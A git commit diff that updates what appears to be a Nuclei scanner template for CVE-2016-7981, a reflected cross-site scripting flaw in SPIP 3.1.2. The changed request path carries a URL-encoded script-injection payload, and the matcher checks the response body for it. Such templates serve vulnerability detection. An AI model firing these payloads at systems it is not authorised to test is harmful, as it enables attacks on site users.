Update CVE-2016-7981.yaml
parent
fb055acf9e
commit
0ce590a3f2
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-7981
|
||||
|
||||
info:
|
||||
name: SPIP 3.1.2 XSS.
|
||||
name: SPIP 3.1.2 XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -12,13 +12,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
Loading…
Reference in New Issue